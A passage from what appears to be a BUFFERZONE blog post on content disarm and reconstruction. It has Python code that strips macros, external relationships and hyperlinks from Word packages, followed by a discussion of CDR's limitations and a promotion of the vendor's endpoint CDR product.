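        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/_rels/document.xml.rels", rels)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 stand-in OLE blob")
    return buf.getvalue()


def unwrap_hyperlinks(xml_bytes):
    """Replace every w:hyperlink with its children so the text survives but the
    link (whose relationship was dropped) does not. Returns (bytes, count)."""
    root = ET.fromstring(xml_bytes)
    tag, count = f"{{{W_NS}}}hyperlink", 0
    for parent in list(root.iter()):
        for child in list(parent):
            if child.tag == tag:
                idx = list(parent).index(child)
                parent.remove(child)
                for offset, grandchild in enumerate(list(child)):
                    parent.insert(idx + offset, grandchild)
                count += 1
    return ET.tostring(root, xml_declaration=True, encoding="UTF-8"), count


def disarm_docx(data):
    """CDR pass: rebuild the package without VBA parts or external relationships,
    unwrap hyperlinks in the body, and relabel the main part as a plain document.
    Returns (clean_bytes, list of what was removed)."""
    with zipfile.ZipFile(io.BytesIO(data)) as src:
        parts = {i.filename: src.read(i) for i in src.infolist()}
    removed, dropped_parts = [], set()
    ET.register_namespace("", REL_NS)
    for name in [n for n in parts if n.endswith(".rels")]:
        root = ET.fromstring(parts[name])
        for rel in list(root):
            external = rel.get("TargetMode") == "External"
            if rel.get("Type") == VBA_REL or external:
                root.remove(rel)
                removed.append(f"{name}: relationship {rel.get('Id')} -> {rel.get('Target')}")
                if not external:  # its internal target becomes an orphan part: drop it too
                    dropped_parts.add(name.split("_rels/")[0] + rel.get("Target"))
        parts[name] = ET.tostring(root, xml_declaration=True, encoding="UTF-8")
    for name in list(parts):
        if name in dropped_parts or name.lower().endswith(("vbaproject.bin", "vbadata.xml")):
            del parts[name]
            removed.append(f"part {name}")
    ET.register_namespace("", CT_NS)
    root = ET.fromstring(parts["[Content_Types].xml"])
    for el in list(root):  # drop the VBA content type (note: all .bin parts) and relabel the main part
        if el.get("ContentType") == VBA_CT or el.get("PartName", "").lstrip("/") in dropped_parts:
            root.remove(el)
        elif el.get("ContentType") == MACRO_MAIN_CT:
            el.set("ContentType", PLAIN_MAIN_CT)
            removed.append("macro-enabled content type relabeled")
    parts["[Content_Types].xml"] = ET.tostring(root, xml_declaration=True, encoding="UTF-8")
    parts["word/document.xml"], n = unwrap_hyperlinks(parts["word/document.xml"])
    if n:
        removed.append(f"{n} hyperlink element(s) unwrapped")
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name, blob in parts.items():
            dst.writestr(name, blob)
    return out.getvalue(), removed


def package_parts(data):
    """Sorted part names of a package, for inspection."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return sorted(zf.namelist())


def main_part_content_type(data):
    """Content type declared for /word/document.xml, or None."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        root = ET.fromstring(zf.read("[Content_Types].xml"))
    return next((el.get("ContentType") for el in root
                 if el.get("PartName") == "/word/document.xml"), None)
```

    The output is rebuilt from parsed parts rather than patched in place, which is the essence of the "reconstruction" half of CDR: anything the parser did not understand and re-emit is gone by construction, and the relabeling to the plain document content type means Word will not even look for a macro project. The trade-off noted in the post applies here too; the link text survives but the link itself does not.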

    While CDR is an effective cybersecurity technique, it has limitations. During the disarm process, certain file objects may be removed and active components disabled, which can affect the functionality of the resulting file. However, recent academic research [2] has shown that CDR achieves a high malware disarm rate, validated by rescanning the reconstructed files with the many antivirus engines aggregated by VirusTotal.

    A related concern is the similarity between the original file and the CDR output. If the reconstructed file is nearly identical to the original, residual threats may remain; if it is reconstructed too aggressively, fidelity suffers. CDR solutions continue to evolve, and newer techniques aim to remove active content while keeping the reconstructed file as close as possible to the original.

    Another limitation of CDR is that some solutions may require internet access (Software-as-a-Service or SaaS), which could raise concerns about privacy and data security. In certain scenarios, private files may be shared with third parties during the CDR process, which may not be desirable for organizations that prioritize data privacy and confidentiality. 

    It is important for organizations to carefully evaluate and choose CDR solutions that align with their specific security requirements and risk tolerance. While CDR can be a valuable addition to a comprehensive cybersecurity strategy, it is essential to be aware of its limitations and choose solutions that offer the right balance between security and functionality and comply with privacy and data protection requirements. 

     BUFFERZONE SafeBridge™ CDR 

    Currently, CDR solutions are typically deployed in either public or private cloud environments. BUFFERZONE stands out as the only vendor that runs CDR within a secure isolated container on the endpoint itself. This approach reduces latency, eliminates the need for special connectivity, and is cost-effective.

    With BUFFERZONE CDR, downloaded files can be passed through CDR automatically or on demand, since a user may prefer to keep working on a file inside the BUFFERZONE® secure container. BUFFERZONE also offers a Microsoft Outlook plugin that applies CDR to incoming and outgoing email attachments according to the organization's configuration. Every email attachment and downloaded file thus goes through CDR to remove potential threats, without any additional configuration.

    One of the key advantages of BUFFERZONE CDR is its integration with BUFFERZONE Safe Workspace®, without incurring any additional costs. This means that organizations can benefit from a comprehensive security solution that combines CDR with isolated workspace protection, providing a robust defense against cyber threats. 

    In conclusion, BUFFERZONE SafeBridge™ CDR offers a distinctive approach to content disarm and reconstruction: it runs within a secure isolated container on the host, as an integral part of BUFFERZONE Safe Workspace®. This gives organizations an effective and efficient way to secure downloaded files and emails without special connectivity or additional configuration. Detection solutions exist, but they are not 100% effective, so organizations must also reduce their attack surface through smart endpoint isolation and CDR. CDR has been shown to provide an additional layer of defense and to significantly improve an organization's defensive methodology.

    [1] Kaspersky, “New malicious files discovered daily grow by 5.7% to 380000 in 2021”, 2021.  https://www.kaspersky.com/about/press-releases/2021_new-malicious-files-discovered-daily-grow-by-57-to-380000-in-2021 

    [2] R. Dubin, “Content Disarm and Reconstruction of RTF Files A Zero File Trust Methodology,” in IEEE Transactions on Information Forensics and Security, doi: 10.1109/TIFS.2023.3241480.